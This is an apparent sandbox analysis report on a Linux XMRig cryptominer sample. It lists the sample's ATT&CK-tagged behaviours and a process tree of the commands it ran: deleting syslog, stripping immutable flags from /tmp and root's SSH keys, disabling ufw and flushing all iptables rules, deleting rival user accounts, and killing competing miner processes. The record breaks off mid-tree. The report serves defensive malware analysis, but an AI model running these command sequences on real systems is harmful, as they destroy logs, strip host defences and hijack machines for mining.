xmrig_linux | 7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5

Analysis

max time kernel
8s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
29-09-2024 11:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Size

27KB
MD5

fe70c19936ef32efb00f3c75ea90e701
SHA1

461514742ae77741e53efb6975ffd8d3db264c92
SHA256

7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
SHA512

dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
SSDEEP

384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W

Score

10^/10

xmrig_linux defense_evasion discovery evasion execution miner persistence privilege_escalatio privilege_escalation rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

pid process

3025
3034
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
evasion

Clear Linux or Mac System Logs
T1070.002

Processes:

rm

description ioc process

File deleted /var/log/syslog rm
Executes dropped EXE 1 IoCs

Processes:

ioc pid process

/usr/bin/salt-store 3039
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
defense_evasion

Disable or Modify System Firewall
T1562.004

Processes:

ufwiptables

pid process

1475 ufw
1650 iptables
2980
Loads a kernel module 1 IoCs
Loads a Linux kernel module, potentially to achieve persistence
rootkit

Processes:

modprobe

ioc pid process

/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1479 modprobe
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
privilege_escalation defense_evasion

Sudo and Sudo Caching
T1548.003

Processes:

sudo

pid process

1651 sudo

pid	process
3025
3034

description	ioc	process
File deleted	/var/log/syslog	rm

ioc	pid	process
/usr/bin/salt-store	3039

pid	process
1475	ufw
1650	iptables
2980

ioc	pid	process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1479	modprobe

pid	process
1651	sudo

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsiptablesip6tablesxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsiptablesip6tablesxargsxargsxargsiptablesiptablesip6tablesxargsxargsip6tablesip6tablesxargsxargsiptablesxargsxargsxargsxargsxargs

pid	process
2112	xargs
2288	xargs
2577
2946
1525	iptables
2613
2914
1604	ip6tables
2197	xargs
2294	xargs
2482	xargs
2601
2019	xargs
2593
1555	iptables
1768	xargs
1813	xargs
1849	xargs
1929	xargs
3017
1714	xargs
2495	xargs
2545
2565
2573
2009	xargs
2033	xargs
2335	xargs
1934	xargs
1994	xargs
2323	xargs
2519	xargs
1496	iptables
1828	xargs
2048	xargs
2137	xargs
2473	xargs
2377	xargs
2557
1563	iptables
1608	ip6tables
1798	xargs
2144	xargs
2181	xargs
1491	iptables
1526	iptables
1624	ip6tables
2209	xargs
2463	xargs
1612	ip6tables
1636	ip6tables
1904	xargs
2043	xargs
2589
1494	iptables
1699	xargs
1738	xargs
2629
2599
2811
2864
1681	xargs
1818	xargs
1969	xargs

Creates/modifies Cron job 1 TTPs 22 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

Processes:

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.MBL5sb
File opened for modification	/var/spool/cron/crontabs/tmp.S5jaC2
File opened for modification	/var/spool/cron/crontabs/tmp.e6QZR7
File opened for modification	/var/spool/cron/crontabs/tmp.zGIcM9
File opened for modification	/var/spool/cron/crontabs/tmp.JvBX4c
File opened for modification	/var/spool/cron/crontabs/tmp.Sp02W8
File opened for modification	/var/spool/cron/crontabs/tmp.7DCX8c
File opened for modification	/var/spool/cron/crontabs/tmp.2HMGhf
File opened for modification	/var/spool/cron/crontabs/tmp.4uFFl1
File opened for modification	/var/spool/cron/crontabs/tmp.NHBhW5
File opened for modification	/var/spool/cron/crontabs/tmp.F1A5T4
File opened for modification	/var/spool/cron/crontabs/tmp.mtUcga
File opened for modification	/var/spool/cron/crontabs/tmp.ICTYyd
File opened for modification	/var/spool/cron/crontabs/tmp.7eBEPe
File opened for modification	/var/spool/cron/crontabs/tmp.PMxtl7
File opened for modification	/var/spool/cron/crontabs/tmp.EgAcz6
File opened for modification	/var/spool/cron/crontabs/tmp.bZmjOa
File opened for modification	/var/spool/cron/crontabs/tmp.niRZUf
File opened for modification	/var/spool/cron/crontabs/tmp.hK50U2
File opened for modification	/var/spool/cron/crontabs/tmp.ikzJq5
File opened for modification	/var/spool/cron/crontabs/tmp.Uru6m4
File opened for modification	/var/spool/cron/crontabs/tmp.jlqbs8

Disables AppArmor 28 IoCs
Disables AppArmor security module.

Processes:

pid process

2976
2976
2981
2956
2969
2981
2981
2991
2956
2976
2956
2988
3004
2981
2981
2981
2956
2976
2988
2988
2956
2956
2993
2988
2988
2976
2976
2988
Disables SELinux 1 TTPs 1 IoCs
Disables SELinux security module.
defense_evasion

Disable or Modify Tools
T1562.001

Processes:

pid process

2955
Enumerates running processes
Discovers information about currently running processes on the system
Write file to user bin folder 2 IoCs
persistence

Processes:

description ioc process

File opened for modification /usr/bin/salt-store
File opened for modification /usr/bin/salt-store
Changes its process name 1 IoCs

Processes:

description ioc pid process

Changes the process name, possibly in an attempt to hide itself (sysv-install) 2973

pid	process
2976
2976
2981
2956
2969
2981
2981
2991
2956
2976
2956
2988
3004
2981
2981
2981
2956
2976
2988
2988
2956
2956
2993
2988
2988
2976
2976
2988

pid	process
2955

description	ioc	process
File opened for modification	/usr/bin/salt-store
File opened for modification	/usr/bin/salt-store

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	2973

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

pspspspspspskillpspskillpspspspspspspspspspspspspspspspspspspspgreppspspspskill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
discovery

System Information Discovery
T1082

Processes:

modprobe

description ioc process

File opened for reading /sys/module/ip6_tables/initstate modprobe
File opened for reading /sys/module/x_tables/initstate modprobe

description	ioc	process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

Processes:

pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspsps

pid	process
1814	ps
2188	ps
2336	ps
2283	ps
1955	ps
2000	ps
2039	ps
2133	ps
1880	ps
1900	ps
2066	ps
2378	ps
1668	ps
1905	ps
1975	ps
2342	ps
2198	ps
2354	ps
1829	ps
1834	ps
1980	ps
2166	ps
1860	ps
2216	ps
2076	ps
2108	ps
2256	ps
2313	ps
1890	ps
2044	ps
2118	ps
2251	ps
1915	ps
1940	ps
2020	ps
2025	ps
2261	ps
1809	ps
1910	ps
1930	ps
2010	ps
2277	ps
2348	ps
2005	ps
2034	ps
2171	ps
2231	ps
1970	ps
2098	ps
2271	ps
1799	ps
1945	ps
1990	ps
2123	ps
3008
2151	ps
2307	ps
2360	ps
2384	ps
1804	ps
1895	ps
2049	ps
2399	ps
2103	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pspspspspspspspspspspkillpspspspspspspspspspspspspspspgreppspspspspspspspspsps

description	ioc	process
File opened for reading	/proc/84/cmdline
File opened for reading	/proc/451/cmdline	ps
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/1326/status	ps
File opened for reading	/proc/538/stat	ps
File opened for reading	/proc/1066/cmdline	ps
File opened for reading	/proc/484/cmdline	ps
File opened for reading	/proc/1135/status	ps
File opened for reading	/proc/13/stat	ps
File opened for reading	/proc/538/cmdline
File opened for reading	/proc/32/stat	ps
File opened for reading	/proc/25/status	ps
File opened for reading	/proc/492/cmdline	pkill
File opened for reading	/proc/1469/status	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/24/stat	ps
File opened for reading	/proc/455/status
File opened for reading	/proc/1182/stat	ps
File opened for reading	/proc/1155/cmdline
File opened for reading	/proc/484/status
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/1096/status
File opened for reading	/proc/1073/status	ps
File opened for reading	/proc/1154/stat	ps
File opened for reading	/proc/1086/cmdline	ps
File opened for reading	/proc/1066/stat	ps
File opened for reading	/proc/1140/stat	ps
File opened for reading	/proc/1326/status	ps
File opened for reading	/proc/1137/status	ps
File opened for reading	/proc/18/cmdline	ps
File opened for reading	/proc/1073/stat	ps
File opened for reading	/proc/1144/status
File opened for reading	/proc/592/status
File opened for reading	/proc/1169/status
File opened for reading	/proc/416/status
File opened for reading	/proc/164/cmdline	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/1179/cmdline	ps
File opened for reading	/proc/437/status	pgrep
File opened for reading	/proc/334/status
File opened for reading	/proc/27/cmdline	ps
File opened for reading	/proc/443/stat	ps
File opened for reading	/proc/1132/status
File opened for reading	/proc/492/cmdline
File opened for reading	/proc/592/status
File opened for reading	/proc/451/cmdline
File opened for reading	/proc/159/stat
File opened for reading	/proc/1171/stat	ps
File opened for reading	/proc/1279/status
File opened for reading	/proc/1466/cmdline
File opened for reading	/proc/1057/status	ps
File opened for reading	/proc/521/status	ps
File opened for reading	/proc/1115/cmdline	ps
File opened for reading	/proc/23/status
File opened for reading	/proc/1151/cmdline
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/172/cmdline	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/81/status
File opened for reading	/proc/83/status
File opened for reading	/proc/2579/cmdline
File opened for reading	/proc/1157/cmdline
File opened for reading	/proc/940/status	ps

System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

modprobegrepgrepgrep

pid process

1479 modprobe
1992 grep
2022 grep
2243 grep
2773
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.

Processes:

fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

description ioc process

File opened for modification /tmp/log_rot fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

pid	process
1479	modprobe
1992	grep
2022	grep
2243	grep
2773

description	ioc	process
File opened for modification	/tmp/log_rot	fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118

/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
1⤵
- Writes file to tmp directory
PID:1471

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:1472

/usr/bin/chattr
chattr -iua /tmp/
2⤵
PID:1473

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:1474

/usr/sbin/ufw
ufw disable
2⤵
- Flushes firewall rules
PID:1475

/sbin/iptables
/sbin/iptables -V
3⤵
PID:1476

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:1477

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:1478

/sbin/modprobe
/sbin/modprobe ip6_tables
5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:1479

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:1483

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:1486

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:1487

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:1488

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:1489

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:1490

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1491

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:1492

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:1493

/sbin/iptables
iptables -F ufw-after-input
4⤵
- Attempts to change immutable files
PID:1494

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:1495

/sbin/iptables
iptables -F ufw-before-input
4⤵
- Attempts to change immutable files
PID:1496

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:1497

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:1498

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:1499

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:1500

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:1501

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:1502

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:1503

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:1504

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:1505

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:1506

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:1507

/sbin/iptables
iptables -F ufw-track-input
4⤵
PID:1508

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:1509

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:1510

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:1511

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:1512

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:1513

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:1514

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:1515

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:1516

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:1517

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:1518

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:1519

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:1520

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:1521

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:1522

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:1523

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:1524

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
- Attempts to change immutable files
PID:1525

/sbin/iptables
iptables -Z ufw-after-input
4⤵
- Attempts to change immutable files
PID:1526

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:1527

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:1528

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:1529

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1530

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1531

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1532

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1533

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1534

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1535

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1536

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1537

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1538

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1542

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1543

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1544

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1545

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1546

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1547

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1548

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1549

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1550

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1551

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1552

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1553

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1554

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
- Attempts to change immutable files
PID:1555

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1556

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1557

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1558

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1559

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1560

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1561

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1562

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
- Attempts to change immutable files
PID:1563

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1564

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1565

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1566

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1567

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1568

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1569

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1570

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1571

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:1572

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1573

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1574

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1575

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1576

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
PID:1577

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:1578

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1579

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:1580

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1581

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1582

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1583

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1584

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1585

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1586

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1587

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1588

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1589

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1590

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1591

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:1592

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1593

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1594

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1595

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1596

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1597

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1598

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1599

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1600

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1601

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1602

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1603

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1604

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1605

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1606

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:1607

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
- Attempts to change immutable files
PID:1608

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
PID:1609

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1610

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:1611

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
- Attempts to change immutable files
PID:1612

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1613

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1614

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1615

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1616

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1617

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1618

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1619

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1620

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1621

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1622

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1623

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
- Attempts to change immutable files
PID:1624

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1625

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1626

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1627

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1628

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1629

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1630

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1631

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1632

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1633

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1634

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1635

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
- Attempts to change immutable files
PID:1636

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1637

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1638

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1639

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1640

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1641

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1642

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1643

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:1644

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1645

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1646

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1647

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1648

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1649

/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1650

/usr/bin/sudo
sudo sysctl "kernel.nmi_watchdog=0"
2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1651

/usr/sbin/userdel
userdel akay
2⤵
PID:1655

/usr/sbin/userdel
userdel vfinder
2⤵
PID:1659

/usr/bin/chattr
chattr -iae /root/.ssh/
2⤵
PID:1660

/usr/bin/chattr
chattr -iae /root/.ssh/authorized_keys
2⤵
PID:1664

/bin/rm
rm -rf "/tmp/addres*"
2⤵
PID:1665

/bin/rm
rm -rf "/tmp/walle*"
2⤵
PID:1666

/bin/rm
rm -rf /tmp/keys
2⤵
PID:1667

/bin/grep
grep -i "[a]liyun"
2⤵
PID:1669

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1668

/bin/grep
grep -i "[y]unjing"
2⤵
PID:1671

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1670

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1675

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1674

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1676

/bin/grep
grep 185.71.65.238
2⤵
PID:1673

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1681

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1680

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1679

/bin/grep
grep 140.82.52.87
2⤵
PID:1678

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1687

/bin/grep
grep -v -
2⤵
PID:1686

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1685

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1684

/bin/grep
grep :443
2⤵
PID:1683

/usr/bin/xargs
